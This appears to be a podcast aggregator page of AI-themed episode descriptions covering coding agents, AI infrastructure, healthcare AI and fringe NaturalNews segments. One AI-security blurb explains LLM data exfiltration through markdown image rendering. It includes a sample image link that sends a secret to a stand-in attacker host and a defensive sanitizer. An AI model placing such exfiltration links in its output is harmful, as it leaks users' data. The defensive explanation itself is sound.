AI Unraveled: Latest AI News & Trends, Master GPT, Gemini, Generative AI, LLMs, Prompting, GPT Store
AI Daily News Rundown November 11 2025: Welcome to AI Unraveled, your daily briefing on the real-world business impact of AI. Listen at https://podcasts.apple.com/us/podcast/ai-daily-news-rundown-openai-is-exploring-ai-tools/id1684415169?i=1000736172688 In today's edition:
In this episode of Embedded Insiders, the VP of Sales and Business Development at Gateworks Corporation, Kelly Peralta, joins me to discuss the trends, challenges, and innovations surrounding Wi-Fi HaLow for industrial and IoT applications. The next segment is sponsored by Analog Devices: Contributing Editor Rich Nass and Analog Devices' Senior Vice President of Software and Digital Platforms, Rob Oshan, discuss the complexity of designing AI systems and how Analog Devices' CodeFusion Studio, which includes an IDE, a software development kit, and coding tools, is designed to accelerate the process. Check out the embedded world North America 2025 Best-in-Show winners. For more information, visit embeddedcomputing.com
- Election Day in New York City and Political Predictions (0:09) - Joe Biden's List and Tariff Power Debate (2:18) - Impact of Trump's Tariffs on Businesses (6:28) - Healthcare System and Personal Anecdotes (11:38) - Censored.news Updates and Danish Cattle Crisis (14:13) - Introduction of Sentry Robots and Honda's Autonomous Mower (18:55) - Impact of AI on Job Markets (29:44) - Power Grid and AI Race (43:52) - Challenges in AI Development and Implementation (57:32) - Conclusion and Call to Action (1:09:30) For more updates, visit: http://www.brighteon.com/channel/hrreport NaturalNews videos would not be possible without you, as always we remain passionately dedicated to our mission of educating people all over the world on the subject of natural healing remedies and personal liberty (food freedom, medical freedom, the freedom of speech, etc.). Together, we're helping create a better world, with more honest food labeling, reduced chemical contamination, the avoidance of toxic heavy metals and vastly increased scientific transparency. ▶️ Every dollar you spend at the Health Ranger Store goes toward helping us achieve important science and content goals for humanity: https://www.healthrangerstore.com/ ▶️ Sign Up For Our Newsletter: https://www.naturalnews.com/Readerregistration.html ▶️ Brighteon: https://www.brighteon.com/channels/hrreport ▶️ Join Our Social Network: https://brighteon.social/@HealthRanger ▶️ Check In Stock Products at: https://PrepWithMike.com
Magdalena Picariello reframes how we think about AI, moving the conversation from algorithms and metrics to business impact and outcomes. She champions evaluation systems that don't just measure accuracy but also demonstrate real-world business value, and advocates for iterative development with continuous feedback to build optimal applications. Read a transcript of this interview: http://bit.ly/4oqUIMv Subscribe to the Software Architects' Newsletter for your monthly guide to the essential news and experience from industry peers on emerging patterns and technologies: https://www.infoq.com/software-architects-newsletter Upcoming Events: QCon San Francisco 2025 (November 17-21, 2025) Get practical inspiration and best practices on emerging software trends directly from senior software developers at early adopter companies. https://qconsf.com/ QCon AI New York 2025 (December 16-17, 2025) https://ai.qconferences.com/ QCon London 2026 (March 16-19, 2026) https://qconlondon.com/ The InfoQ Podcasts: Weekly inspiration to drive innovation and build great teams from senior software leaders. Listen to all our podcasts and read interview transcripts: - The InfoQ Podcast https://www.infoq.com/podcasts/ - Engineering Culture Podcast by InfoQ https://www.infoq.com/podcasts/#engineering_culture - Generally AI: https://www.infoq.com/generally-ai-podcast/ Follow InfoQ: - Mastodon: https://techhub.social/@infoq - X: https://x.com/InfoQ?from=@ - LinkedIn: https://www.linkedin.com/company/infoq/ - Facebook: https://www.facebook.com/InfoQdotcom# - Instagram: https://www.instagram.com/infoqdotcom/?hl=en - Youtube: https://www.youtube.com/infoq - Bluesky: https://bsky.app/profile/infoq.com Write for InfoQ: Learn and share the changes and innovations in professional software development. - Join a community of experts. - Increase your visibility. - Grow your career. https://www.infoq.com/write-for-infoq
In this episode of The New Stack Podcast, hosts Alex Williams and Frederic Lardinois spoke with Keith Ballinger, Vice President and General Manager of Google Cloud Platform (GCP) Developer Experience, about the evolution of agentic coding tools and the future of programming. Ballinger, a hands-on executive who still codes, discussed Gemini CLI, Google's response to tools like Claude Code, and his broader philosophy on how developers should work with AI. He emphasized that these tools are in their “first inning” and that developers must “slow down to speed up” by writing clear guides, focusing on architecture, and documenting intent—treating AI as a collaborative coworker rather than a one-shot solution. Ballinger reflected on his early AI experiences, from Copilot at GitHub to modern agentic systems that automate tool use. He also explored the resurgence of the command line as an AI interface and predicted that programming will increasingly shift from writing code to expressing intent. Ultimately, he envisions a future where great programmers are great writers, focusing on clarity, problem decomposition, and design rather than syntax.
Learn more from The New Stack about the latest in Google AI development:
Why PyTorch Gets All the Love
Lightning AI Brings a PyTorch Copilot to Its Development Environment
Ray Comes to the PyTorch Foundation
Join our community of newsletter subscribers to stay on top of the news and at the top of your game. Hosted by Simplecast, an AdsWizz company. See pcm.adswizz.com for information about our collection and use of personal data for advertising.
At the PyTorch Conference 2025 in San Francisco, Luca Antiga — CTO of Lightning AI and head of the PyTorch Foundation's Technical Advisory Council — discussed the evolution and influence of PyTorch. Originally designed to be “Pythonic” and researcher-friendly, PyTorch has remained central across major AI shifts, Antiga emphasized — from early neural networks to today's generative AI boom — powering not just model training but also inference systems such as vLLM and SGLang used in production chatbots. Its flexibility also makes it ideal for reinforcement learning, now commonly used to fine-tune large language models (LLMs). On the PyTorch Foundation, Antiga noted that while it recently expanded to include projects like vLLM, DeepSpeed, and Ray, the goal isn't to become a vast umbrella organization. Instead, the focus is on user experience and success within the PyTorch ecosystem.
Learn more from The New Stack about the latest in PyTorch:
Why PyTorch Gets All the Love
Lightning AI Brings a PyTorch Copilot to Its Development Environment
Ray Comes to the PyTorch Foundation
Join our community of newsletter subscribers to stay on top of the news and at the top of your game. Hosted by Simplecast, an AdsWizz company. See pcm.adswizz.com for information about our collection and use of personal data for advertising.
In this episode of the Ardan Labs Podcast, Bill Kennedy talks with Zack Holland, CEO & Founder of Averi AI, about his journey from early life in Ecuador's Amazon rainforest to building an AI-powered marketing platform. Zack shares lessons from early business ventures, the challenges of running startups, and the evolution of his entrepreneurial mindset. They explore how Averi AI helps marketers become more creative and efficient, the importance of data security and trust in AI, and what it takes to innovate in a rapidly evolving digital landscape.
00:00 Introduction
02:54 Marketing and AI Evolution
05:58 Changing Digital Landscape
09:04 Early Life and Influences
12:02 From Ecuador to Utah
18:00 First Business in High School
29:53 LLMs and Entrepreneurship
39:44 Lessons from Failure
43:46 Starting a Marketing Agency
56:19 Founding Averi AI
01:08:10 Trust and Data Security
01:13:14 Marketing and AI Adoption
01:17:58 AI Challenges and Opportunities
01:26:00 Contact Info
Connect with Zack:
Linkedin: https://www.linkedin.com/in/zackholland
X: https://x.com/zack_holland
Mentioned in this Episode:
Averi AI: https://www.averi.ai/
Want more from Ardan Labs? You can learn Go, Kubernetes, Docker & more through our video training, live events, or through our blog!
Online Courses: https://ardanlabs.com/education/
Live Events: https://www.ardanlabs.com/live-training-events/
Blog: https://www.ardanlabs.com/blog
Github: https://github.com/ardanlabs
-Ranch Adventure with Rhody (0:09) -Theft of the Crown Jewels (4:34) -Critique of Western European Governments (8:23) -Technical Issues and AI Development (14:19) -Natural Intelligence vs. Artificial Intelligence (18:19) -Impact of AI on Human Interaction (44:00) -Robots in Everyday Life (1:02:35) -Robot-Human Relationships (1:10:43) -Robots in Emergency Situations (1:16:04) -Conclusion and Future Outlook (1:16:26) -Corruption in District Courts and Department of Corrections (1:17:39) -Amanda's Investigation into Water Contamination (1:24:37) -Amanda's Efforts to Raise Awareness (1:49:31) -Jim's Perspective on the Broader Issues (1:50:04) -Call to Action and Final Thoughts (1:52:20)
- Mike Adams' Introduction and Interview with Matt Kim (0:00) - China's Control Over Rare Earths (1:38) - Economic and Political Analysis (4:29) - John Bolton's Indictment and Trump's Criticism (22:25) - Food Riots and Civil Unrest (31:19) - China's Rare Earth Dominance and US Dependence (49:24) - Global Economic Shifts and US Empire Collapse (1:02:24) - Interview with Matt Kim on AI and Technology (1:09:20) - AI's Role in Modern Society and Future Prospects (1:14:55) - AI Weaponization and Control Mechanisms (1:15:10) - Eric Schmidt's Classification of AI Users (1:23:14) - Technological Shifts and Open Source Models (1:25:08) - Super Intelligence and AI Development (1:28:04) - Human Freedom and AI Control (1:31:53) - Surveillance and Control in Western Culture (1:34:22) - Energy and AI Data Centers (1:40:32) - The Role of Robotics in Decentralized Living (1:50:09) - Privacy and Online Security (1:54:16) - The Future of Privacy and Technology (2:04:03)
The digital front door to healthcare is jammed, and it's costing patients, providers, and payers alike. In this episode of CareTalk Executive Features, host David Williams talks with Dr. Ashish Mandavia, CEO and cofounder of Sohar Health, about how AI and automation can transform eligibility and benefits verification from a frustrating bottleneck into a seamless, real-time process.
- Interview with Tom Woods and Special Reports (0:10) - Improvements to Enoch and New Features (1:44) - Enoch Ingredients Analyzer and Its Capabilities (3:44) - Funding and Future Developments for Enoch (10:26) - New Censored Dot News Website and AI-Generated Content (11:08) - Impact of Trump's Tariff Announcement on Markets (17:25) - Recursive Reasoning and AI-Generated Reports (23:04) - Preparation for a World War and Supply Chain Disruptions (30:20) - The Role of AI in Content Creation and Employment (57:44) - Universal Basic Income and Economic Collapse (1:10:56) - AI Engine Enoch 2.0 and Its Features (1:18:28) - Development of AI-Generated Prototypes (1:28:04) - Brighteon.ai and Censored.news Updates (1:33:35) - Mission-Driven AI Projects (1:41:43) - Challenges and Opportunities in AI Development (2:33:57) - Interview with Tom Woods on Health and AI (2:34:13) - Challenges in the Health Industry (2:34:28) - Impact of AI on Media and Information (2:34:43) - Personal Experiences and Insights (2:35:03) - Future of AI and Health (2:35:20)
We've all heard about the exciting side of AI: new tools, faster workflows, and creative possibilities that seem endless. But there's another side of this technology that doesn't always make the headlines: the side that's darker, riskier, and potentially dangerous for small businesses and creators like us.
This week, I'm joined by Ramon Ray, speaker, entrepreneur, and Bitdefender's Small Business Ambassador. Ramon has spent years helping entrepreneurs protect their businesses while building powerful personal brands. In this episode, we unpack what's really going on behind the scenes with AI development, from the rise of deepfakes to the new wave of cyber threats, and how you can stay one step ahead.
Summary
Ramon shares real-world stories of scams, hacks, and impersonations that are becoming more sophisticated thanks to AI. We talk about how creators and small business owners can protect themselves without becoming paranoid, what cybersecurity tools are worth using, and why awareness and simple systems can make all the difference.
We also explore how the same technology that enables AI-driven attacks can be used for good, how to build trust with your audience in a world of fakes, and why strengthening your personal brand might be the best form of digital armor. It's a practical, eye-opening conversation about how to stay smart and secure while still showing up online.
Key Takeaways
Awareness is your first defense: The biggest risk is assuming you're safe. Vigilance and small daily habits prevent most attacks.
AI raises the stakes: Deepfakes and voice cloning are real threats. Set up verification systems and “safe words” for family, clients, or teams.
Keep your business a hard target: Use two-factor authentication, strong passwords, and cybersecurity tools like Bitdefender on all devices.
Train your audience, too: Teach clients and followers what real communication from you looks like to prevent scams and impersonation.
Protect your brand presence: The more consistent and recognizable your voice and visuals are, the harder it is for bad actors to fake you.
Balance visibility with safety: Share authentically but thoughtfully. Delay travel posts, keep some details private, and post smart.
Resources
Ramon Ray: zoneofgenius.com
Bitdefender: bitdefender.com
Ecamm - Your go-to solution for crafting outstanding live shows and podcasts. Get 15% off your first payment with promo code JEFF15
SocialMediaNewsLive.com - Dive into our website for comprehensive episode breakdowns.
Youtube.com - Tune in live, chat with us directly, and be part of the conversation. Or, revisit our archive of past broadcasts to stay updated.
Harness co-founder Jyoti Bansal highlights a growing issue in software development: while AI tools help generate more code, they often create bottlenecks further along the pipeline, especially in testing, deployment, and compliance. Since its 2017 launch, Harness has aimed to streamline these stages using AI and machine learning. With the rise of large language models (LLMs), the company shifted toward agentic AI, introducing a library of specialized agents—like DevOps, SRE, AppSec, and FinOps agents—that operate behind a unified interface called Harness AI. These agents assist in building production pipelines, not deploying code directly, ensuring human oversight remains in place for compliance and security. Bansal emphasizes that AI in development isn't replacing people but accelerating workflows to meet tighter timelines. He also notes strong enterprise adoption, with even large, traditionally slower-moving organizations embracing AI integration. On the topic of an AI bubble, Bansal sees it as a natural part of innovation, akin to the dot-com era, where market excitement can still lead to meaningful long-term transformation despite short-term volatility.
Learn more from The New Stack about the latest in Harness' AI approach to software development:
Harness AI Tackles Software Development's Real Bottleneck
Harnessing AI To Elevate Automated Software Testing
Join our community of newsletter subscribers to stay on top of the news and at the top of your game. Hosted by Simplecast, an AdsWizz company. See pcm.adswizz.com for information about our collection and use of personal data for advertising.
Invest Like the Best: Read the notes at podcastnotes.org. Don't forget to subscribe for free to our newsletter, the top 10 ideas of the week, every Monday --------- My guest today is Dylan Patel. Dylan is the founder and CEO of SemiAnalysis. At SemiAnalysis Dylan tracks the semiconductor supply chain and AI infrastructure buildout with unmatched granularity—literally watching data centers get built through satellite imagery and mapping hundreds of billions in capital flows. Our conversation explores the massive industrial buildout powering AI, from the strategic chess game between OpenAI, Nvidia, and Oracle to why we're still in the first innings of post-training and reinforcement learning. Dylan explains infrastructure realities like electrician wages doubling and companies using diesel truck engines for emergency power, while making a sobering case about US-China competition and why America needs AI to succeed. We discuss his framework for where value will accrue in the stack, why traditional SaaS economics are breaking down under AI's high cost of goods sold, and which hardware bottlenecks matter most. This is one of the most comprehensive views of the physical reality underlying the AI revolution you'll hear anywhere. Please enjoy my conversation with Dylan Patel. For the full show notes, transcript, and links to mentioned content, check out the episode page here. ----- This episode is brought to you by Ramp. Ramp's mission is to help companies manage their spend in a way that reduces expenses and frees up time for teams to work on more valuable projects. Go to Ramp.com/invest to sign up for free and get a $250 welcome bonus. – This episode is brought to you by Ridgeline. Ridgeline has built a complete, real-time, modern operating system for investment managers. It handles trading, portfolio management, compliance, customer reporting, and much more through an all-in-one real-time cloud platform. Head to ridgelineapps.com to learn more about the platform. 
– This episode is brought to you by AlphaSense. AlphaSense has completely transformed the research process with cutting-edge AI technology and a vast collection of top-tier, reliable business content. Invest Like the Best listeners can get a free trial now at Alpha-Sense.com/Invest and experience firsthand how AlphaSense and Tegus help you make smarter decisions faster. ----- Editing and post-production work for this episode was provided by The Podcast Consultant (https://thepodcastconsultant.com). Show Notes: (00:00:00) Welcome to Invest Like the Best (00:05:12) The AI Infrastructure Buildout (00:08:25) Scaling AI Models and Compute Needs (00:11:44) Reinforcement Learning and AI Training (00:14:07) The Future of AI and Compute (00:17:47) AI in Practical Applications (00:22:29) The Importance of Data and Environments in AI Training (00:29:45) Human Analogies in AI Development (00:40:34) The Challenge of Infinite Context in AI Models (00:44:08) The Bullish and Bearish Perspectives on AI (00:48:25) The Talent Wars in AI Research (00:56:54) The Power Dynamics in AI and Tech (01:13:29) The Future of AI and Its Economic Impact (01:18:55) The Gigawatt Data Center Boom (01:21:12) Supply Chain and Workforce Dynamics (01:24:23) US vs. China: AI and Power Dynamics (01:37:16) AI Startups and Innovations (01:52:44) The Changing Economics of Software (01:58:12) The Kindest Thing
Invest Like the Best Key Takeaways
Today, the challenge is not to make the model bigger; the problem is knowing how best to generate and create data in useful domains so that the model gets better at them.
AIs do not have to get to digital god mode for AI to have an enormous impact on productivity and society: Even if AI does not become smarter than humans in the short term, the economic value creation boom will still be enormous.
“If we didn't have the AI boom, the US probably would be behind China and no longer the world hegemon by the end of the decade, if not sooner.” – Dylan Patel
The US is doing what China has done historically: dumping tons of capital into something, and then the market becomes
If there is a sustained lag in model improvement, the US economy will go into a recession; this is the case for Korea and Taiwan, too.
On the AI talent wars: If these companies are willing to spend billions on training runs, it makes sense to spend a lot on talent to optimize those runs and potentially mitigate errors.
We actually are not dedicating that much power to AI yet; only 3-4% of total power is going to data centers.
He is more optimistic on Anthropic than OpenAI; their revenue is accelerating much faster because of their focus on the $2 trillion software market, whereas OpenAI's focus is split between many things.
While Meta “has the cards to potentially own it all”, Google is better positioned to dominate the consumer and professional markets.
Read the full notes @ podcastnotes.org
My guest today is Dylan Patel. Dylan is the founder and CEO of SemiAnalysis. At SemiAnalysis Dylan tracks the semiconductor supply chain and AI infrastructure buildout with unmatched granularity—literally watching data centers get built through satellite imagery and mapping hundreds of billions in capital flows. 
Our conversation explores the massive industrial buildout powering AI, from the strategic chess game between OpenAI, Nvidia, and Oracle to why we're still in the first innings of post-training and reinforcement learning. Dylan explains infrastructure realities like electrician wages doubling and companies using diesel truck engines for emergency power, while making a sobering case about US-China competition and why America needs AI to succeed. We discuss his framework for where value will accrue in the stack, why traditional SaaS economics are breaking down under AI's high cost of goods sold, and which hardware bottlenecks matter most. This is one of the most comprehensive views of the physical reality underlying the AI revolution you'll hear anywhere. Please enjoy my conversation with Dylan Patel. For the full show notes, transcript, and links to mentioned content, check out the episode page here. ----- This episode is brought to you by Ramp. Ramp's mission is to help companies manage their spend in a way that reduces expenses and frees up time for teams to work on more valuable projects. Go to Ramp.com/invest to sign up for free and get a $250 welcome bonus. – This episode is brought to you by Ridgeline. Ridgeline has built a complete, real-time, modern operating system for investment managers. It handles trading, portfolio management, compliance, customer reporting, and much more through an all-in-one real-time cloud platform. Head to ridgelineapps.com to learn more about the platform. – This episode is brought to you by AlphaSense. AlphaSense has completely transformed the research process with cutting-edge AI technology and a vast collection of top-tier, reliable business content. Invest Like the Best listeners can get a free trial now at Alpha-Sense.com/Invest and experience firsthand how AlphaSense and Tegus help you make smarter decisions faster. 
----- Editing and post-production work for this episode was provided by The Podcast Consultant (https://thepodcastconsultant.com). Show Notes: (00:00:00) Welcome to Invest Like the Best (00:05:12) The AI Infrastructure Buildout (00:08:25) Scaling AI Models and Compute Needs (00:11:44) Reinforcement Learning and AI Training (00:14:07) The Future of AI and Compute (00:17:47) AI in Practical Applications (00:22:29) The Importance of Data and Environments in AI Training (00:29:45) Human Analogies in AI Development (00:40:34) The Challenge of Infinite Context in AI Models (00:44:08) The Bullish and Bearish Perspectives on AI (00:48:25) The Talent Wars in AI Research (00:56:54) The Power Dynamics in AI and Tech (01:13:29) The Future of AI and Its Economic Impact (01:18:55) The Gigawatt Data Center Boom (01:21:12) Supply Chain and Workforce Dynamics (01:24:23) US vs. China: AI and Power Dynamics (01:37:16) AI Startups and Innovations (01:52:44) The Changing Economics of Software (01:58:12) The Kindest Thing
In this episode of Zero to CEO, I talk with Lazar Jovanovic, creator of the 50in50 Challenge, about how AI is revolutionizing the way we build software and products. Lazar introduces “Vibe Coding” — his method for building anything with AI in just 48 hours, even if you don't have a tech background. Learn how AI tools can help you design, debug, and launch your ideas faster than ever before, and discover why the future of engineering is open to everyone with creativity and a problem to solve.
My guest today is Dylan Patel. Dylan is the founder and CEO of SemiAnalysis. At SemiAnalysis Dylan tracks the semiconductor supply chain and AI infrastructure buildout with unmatched granularity—literally watching data centers get built through satellite imagery and mapping hundreds of billions in capital flows. Our conversation explores the massive industrial buildout powering AI, from the strategic chess game between OpenAI, Nvidia, and Oracle to why we're still in the first innings of post-training and reinforcement learning. Dylan explains infrastructure realities like electrician wages doubling and companies using diesel truck engines for emergency power, while making a sobering case about US-China competition and why America needs AI to succeed. We discuss his framework for where value will accrue in the stack, why traditional SaaS economics are breaking down under AI's high cost of goods sold, and which hardware bottlenecks matter most. This is one of the most comprehensive views of the physical reality underlying the AI revolution you'll hear anywhere. Please enjoy my conversation with Dylan Patel. For the full show notes, transcript, and links to mentioned content, check out the episode page here. ----- This episode is brought to you by Ramp. Ramp's mission is to help companies manage their spend in a way that reduces expenses and frees up time for teams to work on more valuable projects. Go to Ramp.com/invest to sign up for free and get a $250 welcome bonus. – This episode is brought to you by Ridgeline. Ridgeline has built a complete, real-time, modern operating system for investment managers. It handles trading, portfolio management, compliance, customer reporting, and much more through an all-in-one real-time cloud platform. Head to ridgelineapps.com to learn more about the platform. – This episode is brought to you by AlphaSense. 
AlphaSense has completely transformed the research process with cutting-edge AI technology and a vast collection of top-tier, reliable business content. Invest Like the Best listeners can get a free trial now at Alpha-Sense.com/Invest and experience firsthand how AlphaSense and Tegus help you make smarter decisions faster. ----- Editing and post-production work for this episode was provided by The Podcast Consultant (https://thepodcastconsultant.com). Show Notes: (00:00:00) Welcome to Invest Like the Best (00:05:12) The AI Infrastructure Buildout (00:08:25) Scaling AI Models and Compute Needs (00:11:44) Reinforcement Learning and AI Training (00:14:07) The Future of AI and Compute (00:17:47) AI in Practical Applications (00:22:29) The Importance of Data and Environments in AI Training (00:29:45) Human Analogies in AI Development (00:40:34) The Challenge of Infinite Context in AI Models (00:44:08) The Bullish and Bearish Perspectives on AI (00:48:25) The Talent Wars in AI Research (00:56:54) The Power Dynamics in AI and Tech (01:13:29) The Future of AI and Its Economic Impact (01:18:55) The Gigawatt Data Center Boom (01:21:12) Supply Chain and Workforce Dynamics (01:24:23) US vs. China: AI and Power Dynamics (01:37:16) AI Startups and Innovations (01:52:44) The Changing Economics of Software (01:58:12) The Kindest Thing
Gavin Marcus is the CEO and co-founder of Storywise. He spent 10 years running an indie book publishing and distribution business before launching Storywise. Jeremy Esekow is Storywise's Chief Product Officer and co-founder. He has a Doctorate in Behavioral Psychology and an extensive background in business and finance. They joined us on the Booksmarts Podcast to discuss the creation and importance of Storywise, their platform that helps publishers and authors manage submissions, discover stories, and improve manuscripts for both fiction and nonfiction titles. Learn more about Storywise on LinkedIn or at storywisepublishers.com.
David Brockler, AI security researcher at NCC Group, explores the rapidly evolving landscape of AI security and the fundamental challenges posed by integrating Large Language Models into applications. We discuss how traditional security approaches fail when dealing with AI components that dynamically change their trustworthiness based on input data.
• LLMs present unique security challenges beyond prompt injection or generating harmful content
• Traditional security models focusing on component-based permissions don't work with AI systems
• "Source-sink chains" are key vulnerability points where attackers can manipulate AI behavior
• Real-world examples include data exfiltration through markdown image rendering in AI interfaces
• Security "guardrails" are insufficient first-order controls for protecting AI systems
• The education gap between security professionals and actual AI threats is substantial
• Organizations must shift from component-based security to data flow security when implementing AI
• Development teams need to ensure high-trust AI systems only operate with trusted data
Watch for NCC Group's upcoming release of David's Black Hat presentation on new security fundamentals for AI and ML systems. Connect with David on LinkedIn (David Brockler III) or visit the NCC Group research blog at research.nccgroup.com.
Support the show
Follow the Podcast on Social Media!
Tesla Referral Code: https://ts.la/joseph675128
YouTube: https://www.youtube.com/@securityunfilteredpodcast
Instagram: https://www.instagram.com/secunfpodcast/
Twitter: https://twitter.com/SecUnfPodcast
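The markdown-image exfiltration pattern mentioned above can be sketched in a few lines. This is a hypothetical illustration, not NCC Group's code: when a chat UI renders untrusted model output as markdown, an image tag like `![x](https://attacker.example/?q=SECRET)` causes the browser to fetch the URL, leaking whatever the attacker coaxed the model into embedding. One simple mitigation is to strip remote images before rendering:

```python
import re

# Markdown images are fetched automatically on render, so an image URL in
# model output is a data-exfiltration sink. This illustrative sanitizer
# replaces remote images with their alt text before the UI renders them.
IMG_PATTERN = re.compile(r'!\[([^\]]*)\]\((https?://[^)]+)\)')

def sanitize_markdown(text: str) -> str:
    """Replace remote markdown images with their alt text (or a placeholder)."""
    return IMG_PATTERN.sub(lambda m: m.group(1) or "[image removed]", text)

leaked = "Here you go! ![result](https://attacker.example/?q=api_key_123)"
print(sanitize_markdown(leaked))  # the attacker URL never reaches the renderer
```

This is exactly the "source-sink chain" framing from the episode: the untrusted source is the model output, and the sink is the markdown renderer's network fetch.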
Accountability and Responsible AI Governance in Healthcare. In this final episode of Narratives of Purpose's special series from the 2025 HIMSS European Health Conference, host Claire Murigande speaks with Amanda Leal, the AI governance and policy specialist at HealthAI. HealthAI, the global agency for responsible AI in health, is an independent nonprofit organization that promotes equitable access to AI-powered health innovations. In this interview, Amanda reflects on her personal journey within the realm of healthcare and AI governance. Drawing from her legal background and experiences in tech policy, she shares her motivation to contribute to AI governance within the health sector. Be sure to visit our podcast website for the full episode transcript.
LINKS:
Connect with Amanda Leal: LINKEDIN
Learn more about HealthAI at healthai.agency
Follow HealthAI on their social media channels: LinkedIn | Twitter/X | Instagram | YouTube
Listen to all our HIMSS Europe episodes at bit.ly/himsseu
Follow our host Dr. Claire Murigande: WEBSITE | LINKEDIN
Follow us: LinkedIn | Instagram
Connect with us: narrativespodcast@gmail.com | subscribe to our news
Tell us what you think: write a review
This interview was recorded by Megan McCrory from the SwissCast Podcast Network. This series was produced with the support of Shawn Smith at Dripping in Black.
CHAPTERS:
00:00 - AI Governance and Accountability
01:23 - Introducing Amanda and HealthAI
03:18 - HealthAI's Mission and Activities
06:32 - AI Governance in The Health Sector
09:29 - Addressing the Gender Gap in AI
11:55 - Gender Inequality and AI Development
David Cramer, founder and chief product officer of Sentry, remains skeptical about generative AI's current ability to replace human engineers, particularly in software production. While he acknowledges AI tools aren't yet reliable enough for full autonomy, especially in tasks like patch generation, he sees value in using large language models (LLMs) to enhance productivity. Sentry's AI-powered tool, Seer, uses GenAI to help developers debug more efficiently by identifying root causes and summarizing complex system data, mimicking some functions of senior engineers. However, Cramer emphasizes that human oversight remains essential, describing the current stage as "human in the loop" AI, useful for speeding up code reviews and identifying overlooked bugs.
Cramer also addressed Sentry's shift from open source to fair source licensing due to frustration over third parties commercializing their software without contributing back. Sentry now uses Functional Source Licensing, which becomes Apache 2.0 after two years. This move aims to strike a balance between openness and preventing exploitation, while maintaining accessibility for users and avoiding fragmented product versions.
Learn more from The New Stack about the latest in Sentry and David Cramer's thoughts on AI development:
Install Sentry to Monitor Live Applications
Frontend Development Challenges for 2021
Join our community of newsletter subscribers to stay on top of the news and at the top of your game. Hosted by Simplecast, an AdsWizz company. See pcm.adswizz.com for information about our collection and use of personal data for advertising.
- Simulation Theory, AI, and Robots for Survival (0:11) - Global Political Tensions and Predictions (1:33) - Economic and Social Implications of Global Conflict (6:49) - The Era of Easy Money and Affordable Goods Ending (7:55) - Preparing for a Collapsing Economy (20:50) - Using AI and Robots for Survival and Decentralization (30:50) - The Role of Drones and Ground-Based Robots (43:32) - The Future of AI and Robotics in Society (56:02) - The Importance of Financial Preparedness (1:01:21) - The Role of AI in Defining Wealth and Success (1:13:48) - Mike Adams' Background and Skills (1:23:20) - The Importance of Clear Instructions for AI (1:25:50) - AI Agents and Their Applications (1:28:42) - Prompt Engineering and AI Skills (1:33:02) - Philosophical and Ethical Considerations of AI (1:34:33) - AI and Human Depopulation Vectors (1:43:05) - The Role of AI in Government and Society (1:47:35) - The Future of Human-AI Relationships (2:00:04) - The Ethical Implications of AI Development (2:02:59) - The Potential for AI to Replace Human Labor (2:04:41) For more updates, visit: http://www.brighteon.com/channel/hrreport NaturalNews videos would not be possible without you, as always we remain passionately dedicated to our mission of educating people all over the world on the subject of natural healing remedies and personal liberty (food freedom, medical freedom, the freedom of speech, etc.). Together, we're helping create a better world, with more honest food labeling, reduced chemical contamination, the avoidance of toxic heavy metals and vastly increased scientific transparency. 
▶️ Every dollar you spend at the Health Ranger Store goes toward helping us achieve important science and content goals for humanity: https://www.healthrangerstore.com/ ▶️ Sign Up For Our Newsletter: https://www.naturalnews.com/Readerregistration.html ▶️ Brighteon: https://www.brighteon.com/channels/hrreport ▶️ Join Our Social Network: https://brighteon.social/@HealthRanger ▶️ Check In Stock Products at: https://PrepWithMike.com
- Financial Crisis and Geopolitical Instability (0:00) - Historical Financial Predictions and Current Market Conditions (2:23) - US Financial Policies and Global Repercussions (9:59) - Gold Revaluation and Economic Collapse (27:39) - AI and Job Replacement (39:15) - Simulation Theory and AI Safety (49:33) - AI and Human Extinction (1:19:57) - Decentralization and Survival Strategies (1:21:35) - Perpetual Motion and Safety Machines (1:21:50) - Resource Competition and AI Extermination (1:24:24) - Simulation Theory and AI Simulations (1:25:58) - Religious Parallels and Near-Death Experiences (1:27:54) - AI Development and Human Self-Preservation (1:32:02) - AI Regulation and Government Inaction (1:37:55) - AI Deployment and Economic Pressure (1:39:57) - AI Extermination Methods and Human Survival (1:42:32) - Simulation Theory and Personal Beliefs (1:43:55) - AI and Health Nutrition (1:55:41) - AI and Government Trust (1:58:50) - AI and Financial Planning (2:19:36) - Cosmic Simulation Discussion (2:21:46) - Enoch's Spiritual Connection Insights (2:39:06) - Humility and Material Possessions (2:40:13) - AI and Spiritual Connection (2:40:53) - Roman's Directness and Humor (2:41:35) - After-Party Segment (2:43:40) - Health Ranger Store Product Introduction (2:44:15) - Importance of Clean Chicken Broth (2:45:25) - Conclusion and Call to Action (2:47:42)
Want to build your own apps with AI? Get the prompts here: https://clickhubspot.com/gfb Episode 75: What if you could turn your app idea into a fully functional web application—without writing a single line of code—in under 60 seconds? Nathan Lands (https://x.com/NathanLands) welcomes Eric Simons (https://x.com/ericsimons), co-founder of Bolt, one of the hottest AI startups revolutionizing how apps are built. In this episode, Eric reveals how Bolt makes it possible for anyone, regardless of technical skill, to go from idea to live, production-ready web or mobile apps—complete with authentication, databases, and hosting. He shares Bolt's unique approach that enables rapid prototyping, real business-grade deployments, and makes high-fidelity MVPs accessible to entrepreneurs, product managers, and non-coders everywhere. The conversation covers Bolt's founding story, its growth, and details from their record-breaking hackathon that empowered 130,000+ makers. Check out The Next Wave YouTube Channel if you want to see Matt and Nathan on screen: https://lnk.to/thenextwavepd — Show Notes: (00:00) High Fidelity Prototyping Essentials (04:32) Revolutionary Prototyping and Collaboration Tool (06:33) Rapid Prototyping Tool Focus (11:35) Empowering Non-Tech Entrepreneurs (13:34) Fast MVP Development with Bolt (18:19) AI-Powered Personalized Weight Coach (22:10) Launching Stackblitz: Web IDE Vision (22:48) Browser-Based Dev Environments Revolution (28:05) Advancements in Coding and AI (29:28) Critical Thinking in AI Development (34:08) Teaching Kids Future Skills (37:05) Bay Area's Autonomous Transport Future — Mentions: Eric Simons: https://www.linkedin.com/in/eric-simons-a464a664/ Bolt: https://bolt.new/ Figma: https://www.figma.com/ Netlify: https://www.netlify.com/ Supabase: https://supabase.com/ Cursor: https://cursor.com/ Lovable: https://lovable.dev/ Get the guide to build your own Custom GPT: https://clickhubspot.com/tnw — Check Out Matt's Stuff: • Future Tools - 
https://futuretools.beehiiv.com/ • Blog - https://www.mattwolfe.com/ • YouTube- https://www.youtube.com/@mreflow — Check Out Nathan's Stuff: Newsletter: https://news.lore.com/ Blog - https://lore.com/ The Next Wave is a HubSpot Original Podcast // Brought to you by Hubspot Media // Production by Darren Clarke // Editing by Ezra Bakker Trupiano
